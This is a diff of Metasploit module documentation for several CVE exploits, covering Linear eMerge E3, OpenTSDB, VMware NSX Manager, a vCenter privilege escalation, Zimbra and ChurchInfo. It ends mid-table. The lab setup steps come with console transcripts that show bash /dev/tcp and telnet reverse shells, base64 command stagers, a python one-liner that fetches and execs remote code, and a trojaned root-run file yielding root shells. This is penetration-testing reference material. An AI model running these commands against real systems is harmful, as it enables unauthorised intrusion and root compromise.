+   LHOST                   yes       The listen address (an interface may be specified)
+   LPORT  4444             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   Unix Command
+
+
+View the full module info with the info, or info -d command.
+
+msf6 exploit(linux/http/linear_emerge_unauth_rce_cve_2019_7256) > set rhosts 192.168.100.180
+rhosts => 192.168.100.180
+msf6 exploit(linux/http/linear_emerge_unauth_rce_cve_2019_7256) > set lhost 192.168.100.7
+lhost => 192.168.100.7
+msf6 exploit(linux/http/linear_emerge_unauth_rce_cve_2019_7256) > set lport 4444
+lport => 4444
+msf6 exploit(linux/http/linear_emerge_unauth_rce_cve_2019_7256) > set target 0
+target => 0
+msf6 exploit(linux/http/linear_emerge_unauth_rce_cve_2019_7256) > exploit
+
+[*] Started reverse TCP handler on 192.168.100.7:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] Checking if 192.168.100.180:80 can be exploited.
+[*] Performing command injection test issuing a sleep command of 2 seconds.
+[*] Elapsed time: 3.16 seconds.
+[+] The target is vulnerable. Successfully tested command injection.
+[*] Executing Unix Command with bash -c '0<&179-;exec 179<>/dev/tcp/192.168.100.7/4444;sh <&179 >&179 2>&179'
+[*] Command shell session 1 opened (127.0.0.1:4444 -> 127.0.0.1:54274) at 2022-12-01 18:51:54 +0000
+
+uname -a
+Linux cuckoo 3.14.54 #1 SMP PREEMPT Thu Dec 6 19:08:58 PST 2018 armv7l GNU/Linux
+whoami
+root
+exit
+```
+
+### Nortek Linear eMerge E3 Elite access controller meterpreter session
+
+```
+msf6 > use exploit/linux/http/linear_emerge_unauth_rce_cve_2019_7256
+[*] Using configured payload linux/armle/meterpreter_reverse_tcp
+msf6 exploit(linux/http/linear_emerge_unauth_rce_cve_2019_7256) > options
+
+Module options (exploit/linux/http/linear_emerge_unauth_rce_cve_2019_7256):
+
+   Name     Current Setting  Required  Description
+   ----     ---------------  --------  -----------
+   Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS                    yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
+   RPORT    80               yes       The target port (TCP)
+   SRVHOST  0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine
+                                       or 0.0.0.0 to listen on all addresses.
+   SRVPORT  8080             yes       The local port to listen on.
+   SSL      false            no        Negotiate SSL/TLS for outgoing connections
+   SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
+   URIPATH                   no        The URI to use for this exploit (default is random)
+   VHOST                     no        HTTP server virtual host
+
+
+Payload options (linux/armle/meterpreter_reverse_tcp):
+
+   Name   Current Setting  Required  Description
+   ----   ---------------  --------  -----------
+   LHOST                   yes       The listen address (an interface may be specified)
+   LPORT  4444             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   1   Linux Dropper
+
+
+View the full module info with the info, or info -d command.
+
+msf6 exploit(linux/http/linear_emerge_unauth_rce_cve_2019_7256) > set rhosts 192.168.100.180
+rhosts => 192.168.100.180
+msf6 exploit(linux/http/linear_emerge_unauth_rce_cve_2019_7256) > set lhost 192.168.100.7
+lhost => 192.168.100.7
+msf6 exploit(linux/http/linear_emerge_unauth_rce_cve_2019_7256) > set lport 4444
+lport => 4444
+msf6 exploit(linux/http/linear_emerge_unauth_rce_cve_2019_7256) > set target 1
+target => 1
+msf6 exploit(linux/http/linear_emerge_unauth_rce_cve_2019_7256) > exploit
+
+[*] Started reverse TCP handler on 192.168.100.7:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] Checking if 192.168.100.180:80 can be exploited.
+[*] Performing command injection test issuing a sleep command of 2 seconds.
+[*] Elapsed time: 3.18 seconds.
+[+] The target is vulnerable. Successfully tested command injection.
+[*] Executing Linux Dropper
+[*] Using URL: http://192.168.100.7:8080/n6tUft9RrS
+[*] Client 127.0.0.1 (Wget) requested /n6tUft9RrS
+[*] Sending payload to 127.0.0.1 (Wget)
+[*] Meterpreter session 2 opened (127.0.0.1:4444 -> 127.0.0.1:49448) at 2022-12-01 18:50:26 +0000
+[*] Command Stager progress - 100.00% done (125/125 bytes)
+[*] Server stopped.
+
+meterpreter > sysinfo
+Computer     : 192.168.100.180
+OS           :  (Linux 3.14.54)
+Architecture : armv7l
+BuildTuple   : armv5l-linux-musleabi
+Meterpreter  : armle/linux
+meterpreter > getuid
+Server username: root
+```
+
+## Limitations
+Due to the limitations of restricted `busybox` command implementation on the Linear eMerge E3 Access Controller, only a
+few unix command payloads will work such as `cmd/unix/reverse_bash` or `cmd/unix/reverse` (telnet).
+
@@ -2,8 +2,9 @@

 Download the vulnerable version of OVA or ISO file from following URL. I strongly suggest you to choose OVA.

-[http://s3-eu-west-1.amazonaws.com/innotim/Logsign.ova](http://s3-eu-west-1.amazonaws.com/innotim/Logsign.ova)
-[http://s3-eu-west-1.amazonaws.com/innotim/forest-4.4.1-12.04.iso](http://s3-eu-west-1.amazonaws.com/innotim/forest-4.4.1-12.04.iso)
+Download links are provided for reference only and are not maintained by the project. Utilize at your own risk!
+http://s3-eu-west-1.amazonaws.com/innotim/Logsign.ova
+http://s3-eu-west-1.amazonaws.com/innotim/forest-4.4.1-12.04.iso

 ### Creating A Testing Environment

@@ -76,4 +77,4 @@ dns-nameservers 8.8.8.8
 meterpreter > getuid
 Server username: root
 meterpreter >
-```
+```
@@ -0,0 +1,149 @@
+## Vulnerable Application
+This module exploits an unauthenticated command injection vulnerability in the yrange parameter
+in OpenTSDB through 2.4.0 (CVE-2020-35476) in order to achieve unauthenticated remote code execution as the root user.
+
+The module first attempts to obtain the OpenTSDB version via the api. If the version is 2.4.0 or lower,
+the module performs additional checks to obtain the configured metrics and aggregators.
+It then randomly selects one metric and one aggregator and uses those to instruct the target server to plot a graph.
+As part of this request, the yrange parameter is set to the payload, which will then be executed by the target if the latter is vulnerable.
+
+This module has been successfully tested against OpenTSDB version 2.3.0.
+
+## Installation Information
+OpenTSDB is open source software. Vulnerable releases are available [here](https://github.com/OpenTSDB/opentsdb/releases).
+Documentation and installation instructions are available [here](http://opentsdb.net/docs/build/html/index.html).
+
+## Verification Steps
+1. Start msfconsole
+2. Do: `use exploit/linux/http/opentsdb_yrange_cmd_injection`
+3. Do: `set RHOSTS [IP]`
+4. Do: `set LHOST [IP]`
+5. Do: `set SRVHOST [IP]`
+6. Do: `exploit`
+
+## Options
+### TARGETURI
+The base path to OpenTSDB. The default value is `/`.
+
+## Targets
+```
+Id  Name
+--  ----
+0   Automatic (Unix In-Memory)
+1   Automatic (Linux Dropper)
+```
+
+## Scenarios
+### OpenTSDB 2.3.0 - Linux target
+```
+msf6 exploit(linux/http/opentsdb_yrange_cmd_injection) > options
+
+Module options (exploit/linux/http/opentsdb_yrange_cmd_injection):
+
+   Name       Current Setting  Required  Description
+   ----       ---------------  --------  -----------
+   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS     10.10.1.1        yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
+   RPORT      4242             yes       The target port (TCP)
+   SRVHOST    10.10.1.30       yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0
+                                         .0 to listen on all addresses.
+   SRVPORT    8080             yes       The local port to listen on.
+   SSL        false            no        Negotiate SSL/TLS for outgoing connections
+   SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
+   TARGETURI  /                yes       The base path to OpenTSDB
+   URIPATH                     no        The URI to use for this exploit (default is random)
+   VHOST                       no        HTTP server virtual host
+
+
+Payload options (linux/x86/meterpreter/reverse_tcp):
+
+   Name   Current Setting  Required  Description
+   ----   ---------------  --------  -----------
+   LHOST  10.10.1.30       yes       The listen address (an interface may be specified)
+   LPORT  1312             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   1   Automatic (Linux Dropper)
+
+
+msf6 exploit(linux/http/opentsdb_yrange_cmd_injection) > run
+
+[*] Started reverse TCP handler on 10.10.1.30:1312
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target appears to be vulnerable. The target is OpenTSDB version 2.3.0
+[*] Identified 25 configured metrics. Using metric MessagePrePublishingEvents.min
+[*] Identified 31 configured aggregators. Using aggregator sum
+[*] Generated command stager: ["echo -n f0VMRgEBAQAAAAAAAAAAAAIAAwABAAAAVIAECDQAAAAAAAAAAAAAADQAIAABAAAAAAAAAAEAAAAAAAAAAIAECACABAjPAAAASgEAAAcAAAAAEAAAagpeMdv341NDU2oCsGaJ4c2Al1toCgoHJWgCAAUgieFqZlhQUVeJ4UPNgIXAeRlOdD1oogAAAFhqAGoFieMxyc2AhcB5vesnsge5ABAAAInjwesMweMMsH3NgIXAeBBbieGZsmqwA82AhcB4Av/huAEAAAC7AQAAAM2A>>'/tmp/XeJKe.b64' ; ((which base64 >&2 && base64 -d -) || (which base64 >&2 && base64 --decode -) || (which openssl >&2 && openssl enc -d -A -base64 -in /dev/stdin) || (which python >&2 && python -c 'import sys, base64; print base64.standard_b64decode(sys.stdin.read());') || (which perl >&2 && perl -MMIME::Base64 -ne 'print decode_base64($_)')) 2> /dev/null > '/tmp/JIulg' < '/tmp/XeJKe.b64' ; chmod +x '/tmp/JIulg' ; '/tmp/JIulg' & sleep 2 ; rm -f '/tmp/JIulg' ; rm -f '/tmp/XeJKe.b64'"]
+[*] Transmitting intermediate stager...(106 bytes)
+[*] Sending stage (1017704 bytes) to 10.10.1.1
+[*] Command Stager progress - 100.00% done (773/773 bytes)
+[*] Meterpreter session 4 opened (10.10.1.30:1312 -> 10.10.1.1:47720) at 2022-11-24 19:27:06 +0000
+
+meterpreter > getuid
+Server username: root
+```
+
+### OpenTSDB 2.3.0 - Unix target
+```
+msf6 exploit(linux/http/opentsdb_yrange_cmd_injection) > options
+
+Module options (exploit/linux/http/opentsdb_yrange_cmd_injection):
+
+   Name       Current Setting  Required  Description
+   ----       ---------------  --------  -----------
+   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS     10.10.1.1        yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
+   RPORT      4242             yes       The target port (TCP)
+   SRVHOST    10.10.1.30       yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0
+                                         .0.0 to listen on all addresses.
+   SRVPORT    8080             yes       The local port to listen on.
+   SSL        false            no        Negotiate SSL/TLS for outgoing connections
+   SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
+   TARGETURI  /                yes       The base path to OpenTSDB
+   URIPATH                     no        The URI to use for this exploit (default is random)
+   VHOST                       no        HTTP server virtual host
+
+
+Payload options (cmd/unix/reverse):
+
+   Name   Current Setting  Required  Description
+   ----   ---------------  --------  -----------
+   LHOST  10.10.1.30       yes       The listen address (an interface may be specified)
+   LPORT  1337             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   Automatic (Unix In-Memory)
+
+
+msf6 exploit(linux/http/opentsdb_yrange_cmd_injection) > run
+
+[+] sh -c '(sleep 3851|telnet 10.10.1.30 1337|while : ; do sh && break; done 2>&1|telnet 10.10.1.30 1337 >/dev/null 2>&1 &)'
+[*] Started reverse TCP double handler on 10.10.1.30:1337
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target appears to be vulnerable. The target is OpenTSDB version 2.3.0
+[*] Identified 25 configured metrics. Using metric MessagePrePublishingEvents.mean_rate
+[*] Identified 31 configured aggregators. Using aggregator max
+[*] Executing the payload
+[*] Accepted the first client connection...
+[*] Accepted the second client connection...
+[*] Command: echo q08IVzJKPKz8soea;
+[*] Writing to socket A
+[*] Writing to socket B
+[*] Reading from sockets...
+[*] Reading from socket B
+[*] B: "q08IVzJKPKz8soea\r\n"
+[*] Matching...
+[*] A is input...
+[*] Command shell session 3 opened (10.10.1.30:1337 -> 10.10.1.1:52370) at 2022-11-24 19:24:06 +0000
+
+id
+uid=0(root) gid=0(root) groups=0(root)
+```
@@ -9,6 +9,7 @@ performs remote code execution as root by abusing the *extract* function used in

 ### Testing Environment

+Download links are provided for reference only and are not maintained by the project. Utilize at your own risk!
 Setup [Unraid 6.8.0](https://s3.amazonaws.com/dnld.lime-technology.com/stable/unRAIDServer-6.8.0-x86_64.zip)
 according to the [UnRAID Getting Started](https://wiki.unraid.net/UnRAID_6/Getting_Started) guide.

@@ -0,0 +1,173 @@
+## Vulnerable Application
+
+VMware Cloud Foundation contains a remote code execution vulnerability via XStream open source library [CVE-2022-39144](https://nvd.nist.gov/vuln/detail/CVE-2021-39144).
+VMware has evaluated the severity of this issue to be in the [Critical severity range](https://www.vmware.com/support/policies/security_response.html) with a maximum CVSSv3 base score of [9.8](https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H).
+Due to an unauthenticated endpoint that leverages XStream for input serialization in VMware Cloud Foundation (NSX-V),
+a malicious actor can get remote code execution in the context of `root` on the appliance.
+
+VMware Cloud Foundation `3.x` and more specific NSX Manager Data Center for vSphere up to and including version `6.4.13`
+are vulnerable to Remote Command Injection.
+
+This module has been tested against VMware NSX Manager (NSX-V) with the specifications listed below:
+
+* VMware NSX Manager
+* Version `6.4.13`
+* Version `6.4.4`
+
+## Verification Steps
+
+Follow these instructions to install a vulnerable VMware NSX Manager on VirtualBox.
+* Go to [Download VMware NSX for vSphere 6.4.13](https://customerconnect.vmware.com/en/downloads/details?downloadGroup=NSXV_6413&productId=417&rPId=96480)
+* Note: You need to be a customer with valid VMware subscriptions
+* Download the ova file `VMware-NSX-Manager-6.4.13-19307994.ova`
+* Open VirtualBox and import the ova file
+* After sucessful import, start the VM and you have a VMware NSX Manager running which is accessible using url `https://<nsx-manager-ip>`
+* Credentials to login: user: `admin`, password: `default`
+* Use the module and options below to test the vulnerability...
+
+1. `use use exploit/linux/http/vmware_nsxmgr_xstream_rce_cve_2021_39144`
+1. `set RHOSTS <TARGET HOSTS>`
+1. `set RPORT <port>`
+1. `set LHOST <attacker host ip>`
+1. `set LPORT <attacker host port>`
+1. `set TARGET <0-Unix command or 1-Linux Dropper>`
+1. `exploit`
+1. You should get a `bash` shell or `meterpreter` session depending on the target and payload settings.
+
+## Options
+No specific options.
+
+## Scenarios
+
+### VMware NSX Manager bash reverse shell
+
+```
+msf6 > use exploit/linux/http/vmware_nsxmgr_xstream_rce_cve_2021_39144
+[*] Using configured payload cmd/unix/reverse_bash
+msf6 exploit(linux/http/vmware_nsxmgr_xstream_rce_cve_2021_39144) > options
+
+Module options (exploit/linux/http/vmware_nsxmgr_xstream_rce_cve_2021_39144):
+
+   Name     Current Setting  Required  Description
+   ----     ---------------  --------  -----------
+   Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS                    yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
+   RPORT    443              yes       The target port (TCP)
+   SRVHOST  0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machi
+                                       ne or 0.0.0.0 to listen on all addresses.
+   SRVPORT  8080             yes       The local port to listen on.
+   SSL      true             no        Negotiate SSL/TLS for outgoing connections
+   SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
+   URIPATH                   no        The URI to use for this exploit (default is random)
+   VHOST                     no        HTTP server virtual host
+
+
+Payload options (cmd/unix/reverse_bash):
+
+   Name   Current Setting  Required  Description
+   ----   ---------------  --------  -----------
+   LHOST                   yes       The listen address (an interface may be specified)
+   LPORT  4444             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   Unix (In-Memory)
+
+
+msf6 exploit(linux/http/vmware_nsxmgr_xstream_rce_cve_2021_39144) > set rhosts 192.168.100.5
+rhosts => 192.168.100.5
+msf6 exploit(linux/http/vmware_nsxmgr_xstream_rce_cve_2021_39144) > set lhost 192.168.100.7
+lhost => 192.168.100.7
+msf6 exploit(linux/http/vmware_nsxmgr_xstream_rce_cve_2021_39144) > exploit
+
+[*] Started reverse TCP handler on 192.168.100.7:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] Checking if 192.168.100.5:443 can be exploited !
+[+] The target appears to be vulnerable. Target is running VMware NSX Manager (NSX-V)
+[*] Executing Unix (In-Memory) with bash -c '0<&44-;exec 44<>/dev/tcp/192.168.100.7/4444;sh <&44 >&44 2>&44'
+[*] Command shell session 14 opened (192.168.100.7:4444 -> 192.168.100.5:42512) at 2022-11-05 10:33:37 +0000
+
+pwd
+/usr/lib/tanuki/bin
+whoami
+root
+exit
+[*] 192.168.100.5 - Command shell session 14 closed.
+
+```
+
+### VMware NSX Manager meterpreter session
+
+```
+msf6 > use exploit/linux/http/vmware_nsxmgr_xstream_rce_cve_2021_39144
+[*] Using configured payload linux/x64/meterpreter/reverse_tcp
+msf6 exploit(linux/http/vmware_nsxmgr_xstream_rce_cve_2021_39144) > options
+
+Module options (exploit/linux/http/vmware_nsxmgr_xstream_rce_cve_2021_39144):
+
+   Name     Current Setting  Required  Description
+   ----     ---------------  --------  -----------
+   Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS                    yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
+   RPORT    443              yes       The target port (TCP)
+   SRVHOST  0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machi
+                                       ne or 0.0.0.0 to listen on all addresses.
+   SRVPORT  8080             yes       The local port to listen on.
+   SSL      true             no        Negotiate SSL/TLS for outgoing connections
+   SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
+   URIPATH                   no        The URI to use for this exploit (default is random)
+   VHOST                     no        HTTP server virtual host
+
+
+Payload options (linux/x64/meterpreter/reverse_tcp):
+
+   Name   Current Setting  Required  Description
+   ----   ---------------  --------  -----------
+   LHOST                   yes       The listen address (an interface may be specified)
+   LPORT  4444             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   1   Linux Dropper
+
+
+msf6 exploit(linux/http/vmware_nsxmgr_xstream_rce_cve_2021_39144) > set rhosts 192.168.100.5
+rhosts => 192.168.100.5
+msf6 exploit(linux/http/vmware_nsxmgr_xstream_rce_cve_2021_39144) > set lhost 192.168.100.7
+lhost => 192.168.100.7
+msf6 exploit(linux/http/vmware_nsxmgr_xstream_rce_cve_2021_39144) > exploit
+
+[*] Started reverse TCP handler on 192.168.100.7:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] Checking if 192.168.100.5:443 can be exploited !
+[+] The target appears to be vulnerable. Target is running VMware NSX Manager (NSX-V)
+[*] Executing Linux Dropper
+[*] Using URL: http://192.168.100.7:8080/G5xrKmpiufcQdCt
+[*] Client 192.168.100.5 (curl/7.81.0) requested /G5xrKmpiufcQdCt
+[*] Sending payload to 192.168.100.5 (curl/7.81.0)
+[*] Command Stager progress - 100.00% done (121/121 bytes)
+[*] Sending stage (3045348 bytes) to 192.168.100.5
+[*] Meterpreter session 13 opened (192.168.100.7:4444 -> 192.168.100.5:42384) at 2022-11-05 10:29:30 +0000
+[*] Server stopped.
+
+meterpreter > getuid
+Server username: root
+meterpreter > sysinfo
+Computer     : 192.168.100.5
+OS           : NSX Manager 6.4.13 (Linux 4.9.297)
+Architecture : x64
+BuildTuple   : x86_64-linux-musl
+Meterpreter  : x64/linux
+meterpreter >
+```
+
+## Limitations
+The vulnerability check is limited in detecting that VMWare NSX Manager (NSX-V) is running without obtaining the version information.
+However all VMware NSX Manager versions up to `6.4.13` are vulnerable, except for `6.4.14`, so most detected targets are likely
+to be vulnerable.
@@ -0,0 +1,112 @@
+## Vulnerable Application
+
+This module exploits a privilege escalation in vSphere/vCenter due to improper permissions on the
+`/usr/lib/vmware-vmon/java-wrapper-vmon` file. It is possible for anyone in the
+`cis` group to write to the file, which will execute as root on `vmware-vmon` service
+restart or host reboot.
+
+This module was successfully tested against VMware VirtualCenter 6.5.0 build-7070488.
+
+The following versions should be vulnerable:
+ - vCenter 7.0 before U2c
+ - vCenter 6.7 before U3o
+ - vCenter 6.5 before U3q
+
+## Verification Steps
+
+1. Start msfconsole
+2. Obtain a shell on vCenter for a user in the `cis` group.
+3. Do: `use exploit/linux/local/vcenter_java_wrapper_vmon_priv_esc`
+4. Do: `set session #`
+5. Do: `run`
+6. Restart the host, or the service (`systemctl restart vmware-vmon.service`) with a user who has permission
+7. You should get a root shell.
+
+## Options
+
+## Scenarios
+
+### VMware VirtualCenter 6.5.0 build-7070488
+
+Get initial shell (any vic group member will do, here we use vsphere-client)
+
+```
+[*] Processing java_wrapper.rb for ERB directives.
+resource (java_wrapper.rb)> use multi/script/web_delivery
+[*] Using configured payload python/meterpreter/reverse_tcp
+resource (java_wrapper.rb)> set lhost 2.2.2.2
+lhost => 2.2.2.2
+resource (java_wrapper.rb)> run
+[*] Exploit running as background job 0.
+[*] Exploit completed, but no session was created.
+[*] Started reverse TCP handler on 2.2.2.2:4444 
+[*] Using URL: http://2.2.2.2:8080/cFK3ylrNE9s
+[*] Server started.
+[*] Run the following command on the target machine:
+python -c "import sys;import ssl;u=__import__('urllib'+{2:'',3:'.request'}[sys.version_info[0]],fromlist=('urlopen',));r=u.urlopen('http://2.2.2.2:8080/cFK3ylrNE9s', context=ssl._create_unverified_context());exec(r.read());"
+msf6 exploit(multi/script/web_delivery) > 
+[*] 1.1.1.1    web_delivery - Delivering Payload (432 bytes)
+[*] Sending stage (24380 bytes) to 1.1.1.1
+[*] Meterpreter session 1 opened (2.2.2.2:4444 -> 1.1.1.1:59084) at 2022-11-20 10:45:06 -0500
+
+msf6 exploit(multi/script/web_delivery) > sessions -i 1
+[*] Starting interaction with 1...
+
+meterpreter > getuid
+Server username: vsphere-client
+meterpreter > sysinfo
+Computer        : localhost.ragedomain
+OS              : Linux 4.4.8 #1-photon SMP Fri Oct 21 20:13:51 UTC 2016
+Architecture    : x64
+System Language : en_US
+Meterpreter     : python/linux
+meterpreter > shell
+Process 6710 created.
+Channel 1 created.
+vpxd -v
+/usr/sbin/vpxd: line 34: ulimit: open files: cannot modify limit: Operation not permitted
+sed: couldn't open temporary file /etc/vmware-vpx/sedXf9kV4: Permission denied
+VMware VirtualCenter 6.5.0 build-7070488
+^Z
+Background channel 1? [y/N]  y
+meterpreter > background
+[*] Backgrounding session 1...
+```
+
+Conduct the priv esc
+
+```
+msf6 exploit(multi/script/web_delivery) > use exploit/linux/local/vcenter_java_wrapper_vmon_priv_esc
+[*] No payload configured, defaulting to linux/x64/meterpreter/reverse_tcp
+msf6 exploit(linux/local/vcenter_java_wrapper_vmon_priv_esc) > set session 1
+session => 1
+msf6 exploit(linux/local/vcenter_java_wrapper_vmon_priv_esc) > set verbose true
+verbose => true
+msf6 exploit(linux/local/vcenter_java_wrapper_vmon_priv_esc) > jobs -K
+Stopping all jobs...
+
+[*] Server stopped.
+msf6 exploit(linux/local/vcenter_java_wrapper_vmon_priv_esc) > run
+
+[!] SESSION may not be compatible with this module:
+[!]  * incompatible session architecture: python
+[*] Started reverse TCP handler on 2.2.2.2:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target appears to be vulnerable. /usr/lib/vmware-vmon/java-wrapper-vmon is writable and owned by cis group
+[+] Original /usr/lib/vmware-vmon/java-wrapper-vmon backed up to /root/.msf4/loot/20221120104723_default_1.1.1.1_javawrappervmo_605726.txt
+[*] Writing payload to /tmp/.BCOL6n
+[*] Writing '/tmp/.BCOL6n' (250 bytes) ...
+[*] Writing trojaned /usr/lib/vmware-vmon/java-wrapper-vmon
+[*] Attempting to restart vmware-vmon service
+[-] vmware-vmon service needs to be restarted, or host rebooted to obtain shell.
+[*] Waiting 1800 seconds for shell
+[*] Transmitting intermediate stager...(126 bytes)
+[*] Sending stage (3045348 bytes) to 1.1.1.1
+[+] Deleted /tmp/.BCOL6n
+[*] Meterpreter session 2 opened (2.2.2.2:4444 -> 1.1.1.1:32906) at 2022-11-20 10:47:52 -0500
+[*] Replacing trojaned /usr/lib/vmware-vmon/java-wrapper-vmon with original
+
+meterpreter > getuid
+Server username: root
+meterpreter > 
+```
@@ -1,10 +1,18 @@
 ## Vulnerable Application

-Currently, as of 2022-07-26, all versions of Zimbra are vulnerable. Presumably they'll patch it eventually - I have an open security ticket with Zimbra.
+The following versions of Zimbra are vulnerable:
+
+* Zimbra Collaboration Suite 9.0.0 Patch 26 and earlier
+* Zimbra Collaboration Suite 8.8.15 Patch 33 and earlier

 ## Verification Steps

-Install Zimbra on any supported Linux version and get a session as the `zimbra` user. I used Ubuntu 18.04 for testing, and then CVE-2022-30333 to exploit, but this will work on a fully patched system as well. Then...
+Install Zimbra on any supported Linux version and get a session as the `zimbra`
+user. The easiest way to exploit zimbra is to `rm $(which pax)`, reboot, and
+use CVE-2022-41352. Or generate a Meterpreter payload with `msfvenom` and run
+it.
+
+From there:

 ```
 msf6 exploit(linux/fileformat/unrar_cve_2022_30333) > sessions -l
@@ -0,0 +1,164 @@
+## Vulnerable Application
+* Project Homepage: http://www.churchdb.org/
+* Project Download: https://sourceforge.net/projects/churchinfo/files/
+
+ChurchInfo is an open source PHP application used to help churches manage systems and users of the church.
+There are various vulnerabilities in the ChurchInfo software which can be exploited by an
+attacker, however this module targets an authenticated remote code execution (RCE) vulnerability
+known as CVE-2021-43258 to execute code as the web daemon user (e.g. www-data).
+
+ChurchInfo v1.2.13, v1.2.14, and v1.3.0 contain functionality to email users listed in the ChurchInfo database
+with attachments. When preparing the email, a draft of the attachment is saved into
+`/tmp_attach/`, which is a web accessible folder under the ChurchInfo web root. Before the email is sent,
+the attachment draft can be loaded in the application. By uploading a malicious PHP file
+as an attachment and then browsing to it on the web server, RCE can be achieved.
+
+This vulnerability was assigned CVE-2021-43258. Version 1.3.0 was the latest version of ChurchInfo at the time
+of writing and there is presently no known patch for this issue.
+
+### Installation
+Installation guides are available on the SourceForge site at https://sourceforge.net/projects/churchinfo/files/.
+
+The following however is a quick and easy way to get most versions of ChurchInfo up and running using Docker,
+which should make it a lot easier to setup and also clean up once you are finished testing things out.
+
+1. `wget https://master.dl.sourceforge.net/project/churchinfo/churchinfo/1.3.0/churchinfo-1.3.0.tar.gz`
+1. `tar -xvf churchinfo-1.3.0.tar.gz`
+1. `sudo docker run -i -t -p "9090:80" -v ${PWD}/churchinfo:/app mattrayner/lamp:0.8.0-1804-php7`.
+1. `sudo docker ps -a` and find the container ID that was created and which is now running.
+1. `sudo docker exec -it *container ID* /bin/bash`
+1. Inside the new prompt:
+1. `mysqladmin -u root -p create churchinfo` and press the ENTER key when prompted for the password.
+1. `cd /app/churchinfo/SQL`
+1. `mysql -u root -p churchinfo < Install.sql` and press the ENTER key when prompted for the password.
+1. `apt-get install nano` if you want to use Nano.
+1. `nano /app/churchinfo/Include/Config.php`.
+1. Set the `$sUSER` variable to `'root'`.
+1. Set the `$sPASSWORD` variable to `''`.
+1. Set the `$sRootPath` variable to `'/churchinfo'`. This should be default though.
+1. Set the `$URL[0]` to `http://localhost/churchinfo/Default.php`.
+1. Exit out of `nano` and run `/etc/init.d/apache2 restart`
+1. Log in at `http://127.0.0.1:9090/churchinfo/Default.php` with the username `Admin` and password `churchinfoadmin`.
+1. This should cause the app to redirect to a password change form.
+1. Specify the old password, aka `churchinfoadmin` and then specify the new password twice and submit the form.
+1. Go to `http://127.0.0.1:9090/churchinfo/PersonEditor.php` and fill out the form with as much detail as possible.
+1. Click "Save and Add".
+
+## Verification Steps
+This module requires authenticated access to the application. After identifying a vulnerable
+ChurchInfo application, there MUST be a person entry available within the database. If there are no person
+entries within the database, it will not be possible to create a draft email. This draft email
+will be used to place the malicious attachment into the `/tmp_attach` directory for our exploit.
+
+1. Start `msfconsole`
+1. `use exploit/multi/http/churchinfo_upload_exec`
+1. Set the target `RHOST`, `APPBASE`, `USERNAME`, and `PASSWORD` values.
+1. Optional: Set the target `RPORT` if the ChurchInfo server is running on a different port than port 80.
+1. Optional: `set SSL true` if the target is using SSL for ChurchInfo.
+1. Select the payload of choice or leave default.
+1. Set the `LHOST` to your system.
+1. Run the exploit with `run`, enjoy the shell!
+
+## Options
+There are a handful of options which can be used to further configure the attack or other environmental uses.
+
+### USERNAME
+The username of a valid user account for the ChurchInfo application. Default is `admin`.
+
+### PASSWORD
+The password for a valid user account for the ChurchInfo application. Default is `churchinfoadmin` based on documentation.
+
+### APPBASE
+The base directory path to the ChurchInfo application. This can and will likely
+vary depending on how the application was installed. Default value is `/churchinfo/`.
+
+### EMAIL_SUBJ
+The subject of the draft email used for the exploit, the email is not sent. Default value is `Read this now!`.
+
+### EMAIL_MESG
+The message on the draft email which is used for the exploit. The email is not sent. Default value is `Hello there!`.
+
+## Scenarios
+If there are no person entries in the database, the exploit will fail. To help troubleshoot, enable verbose mode with the following:
+
+```
+set verbose true
+```
+
+This will enable additional information and details about the exploit as it is launched.
+
+### ChurchInfo v1.3.0 with MySQL 5.7.35 on Ubuntu Linux 18.04.2 LTS (Docker Image)
+```
+msf6 > use exploit/multi/http/churchinfo_upload_exec
+[*] No payload configured, defaulting to php/meterpreter/reverse_tcp
+msf6 exploit(multi/http/churchinfo_upload_exec) > set RHOST 127.0.0.1
+RHOST => 127.0.0.1
+msf6 exploit(multi/http/churchinfo_upload_exec) > set RPORT 9090
+RPORT => 9090
+msf6 exploit(multi/http/churchinfo_upload_exec) > set PASSWORD testing123
+PASSWORD => testing123
+msf6 exploit(multi/http/churchinfo_upload_exec) > show options
+
+Module options (exploit/multi/http/churchinfo_upload_exec):
+
+   Name        Current Setting  Required  Description
+   ----        ---------------  --------  -----------
+   EMAIL_MESG  Hello there!     yes       Email message in webapp
+   EMAIL_SUBJ  Read this now!   yes       Email subject in webapp
+   PASSWORD    testing123       yes       Password to login with
+   Proxies                      no        A proxy chain of format type:host:port[,type:host:port][...]
